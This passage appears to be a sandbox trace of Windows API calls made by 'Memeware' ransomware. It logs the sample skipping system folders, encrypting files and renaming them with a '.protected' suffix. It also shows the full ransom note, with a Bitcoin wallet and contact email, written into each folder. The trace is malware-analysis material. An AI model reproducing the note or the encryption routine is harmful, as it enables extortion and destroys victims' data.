Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: 
"c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.protected")) returned 1 [0064.246] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.246] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="Windows") returned -1 [0064.246] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="Program Files") returned 1 [0064.246] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="Program Files (x86)") returned 1 [0064.246] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="$Recycle.bin") returned 1 [0064.246] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="System Volume Information") returned 1 [0064.246] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0064.246] StrStrIW (lpFirst="VisiorWW.msi", lpSrch=".protected") returned 0x0 [0064.246] lstrcmpW (lpString1="VisiorWW.msi", lpString2="RESTORE_FILES.txt") returned 1 [0064.246] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.246] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.246] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.247] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0064.247] StrStrW (lpFirst="VisiorWW.msi", lpSrch=".txt") returned 0x0 [0064.247] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0064.247] StrStrW (lpFirst="VisiorWW.msi", lpSrch=".rar") returned 0x0 [0064.247] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0064.247] StrStrW (lpFirst="VisiorWW.msi", lpSrch=".zip") returned 0x0 [0064.247] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.270] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.270] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.271] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.271] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.274] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.274] CloseHandle (hObject=0xb4) returned 1 [0064.279] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.protected") returned 89 [0064.279] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.protected")) returned 1 [0064.280] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.280] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="Windows") returned -1 [0064.280] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="Program Files") returned 1 [0064.280] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="Program Files (x86)") returned 1 [0064.280] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="$Recycle.bin") returned 1 [0064.280] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="System Volume Information") returned 1 [0064.280] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0064.280] StrStrIW (lpFirst="VisiorWW.xml", lpSrch=".protected") returned 0x0 [0064.280] lstrcmpW (lpString1="VisiorWW.xml", lpString2="RESTORE_FILES.txt") returned 1 [0064.280] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.280] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.280] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all 
users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.280] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0064.280] StrStrW (lpFirst="VisiorWW.xml", lpSrch=".txt") returned 0x0 [0064.280] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0064.280] StrStrW (lpFirst="VisiorWW.xml", lpSrch=".rar") returned 0x0 [0064.281] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0064.281] StrStrW (lpFirst="VisiorWW.xml", lpSrch=".zip") returned 0x0 [0064.281] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2213, lpOverlapped=0x0) returned 1 [0064.294] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffdded, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.294] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2213, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2213, lpOverlapped=0x0) returned 1 [0064.295] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.295] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.295] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.295] CloseHandle (hObject=0xb4) returned 1 [0064.296] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.protected") returned 89 [0064.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.protected")) returned 1 [0064.296] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0064.296] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0064.296] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0064.297] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0064.297] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.297] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0064.298] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.298] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0064.298] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.298] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0064.298] CloseHandle (hObject=0xa4) returned 1 [0064.298] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0064.298] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0064.298] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\RESTORE_FILES.txt") returned 43 [0064.298] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\restore_files.txt"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0064.299] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.299] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0064.300] lstrlenA (lpString="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") returned 684 [0064.300] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, 
nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0064.300] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.300] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0064.300] CloseHandle (hObject=0xac) returned 1 [0064.300] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0064.300] FindClose (in: hFindFile=0x447b60 | out: hFindFile=0x447b60) returned 1 [0064.301] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\RESTORE_FILES.txt") returned 33 [0064.301] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0064.301] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.301] WriteFile (in: hFile=0xa0, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0064.302] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.302] WriteFile (in: hFile=0xa0, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0064.302] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.302] WriteFile (in: hFile=0xa0, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, lpOverlapped=0x0) returned 1 [0064.302] CloseHandle (hObject=0xa0) returned 1 [0064.302] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0064.302] lstrcmpiW (lpString1="pagefile.sys", lpString2="Windows") returned -1 [0064.302] lstrcmpiW (lpString1="pagefile.sys", lpString2="Program Files") returned -1 [0064.302] lstrcmpiW (lpString1="pagefile.sys", lpString2="Program Files (x86)") returned -1 [0064.302] lstrcmpiW (lpString1="pagefile.sys", lpString2="$Recycle.bin") returned 1 [0064.302] lstrcmpiW (lpString1="pagefile.sys", lpString2="System Volume Information") returned -1 [0064.302] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0064.302] StrStrIW (lpFirst="pagefile.sys", lpSrch=".protected") returned 0x0 [0064.302] lstrcmpW (lpString1="pagefile.sys", lpString2="RESTORE_FILES.txt") returned -1 [0064.302] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f87c | out: pbBuffer=0x295f87c) returned 1 [0064.303] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f8a4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f8a4*=0x30) returned 1 [0064.303] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.303] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0064.303] lstrcmpiW (lpString1="PerfLogs", lpString2="Windows") returned -1 [0064.303] lstrcmpiW (lpString1="PerfLogs", lpString2="Program Files") returned -1 [0064.303] lstrcmpiW (lpString1="PerfLogs", lpString2="Program Files (x86)") returned -1 [0064.303] lstrcmpiW (lpString1="PerfLogs", lpString2="$Recycle.bin") returned 1 [0064.303] lstrcmpiW (lpString1="PerfLogs", lpString2="System Volume Information") returned -1 [0064.303] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0064.303] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0064.303] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0064.303] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\*") returned 17 [0064.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x447b60 [0064.303] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.303] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.303] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.303] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.303] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.304] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\.") returned 17 [0064.304] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.304] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0064.304] lstrcmpiW (lpString1="..", 
lpString2="Windows") returned -1 [0064.304] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.304] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.304] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.304] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.304] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\..") returned 18 [0064.304] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.304] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.304] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0064.304] lstrcmpiW (lpString1="Admin", lpString2="Windows") returned -1 [0064.304] lstrcmpiW (lpString1="Admin", lpString2="Program Files") returned -1 [0064.304] lstrcmpiW (lpString1="Admin", lpString2="Program Files (x86)") returned -1 [0064.304] lstrcmpiW (lpString1="Admin", lpString2="$Recycle.bin") returned 1 [0064.304] lstrcmpiW (lpString1="Admin", lpString2="System Volume Information") returned -1 [0064.304] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin") returned 21 [0064.304] lstrcmpW (lpString1="Admin", lpString2=".") returned 1 [0064.304] lstrcmpW (lpString1="Admin", lpString2="..") returned 1 [0064.304] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\*") returned 23 [0064.304] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0064.304] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.304] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.304] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.304] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 
[0064.304] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.305] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\.") returned 23 [0064.305] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.305] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0064.305] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.305] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.305] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.305] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.305] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.305] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\..") returned 24 [0064.305] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.305] lstrcmpW (lpString1="..", lpString2="..") returned 0 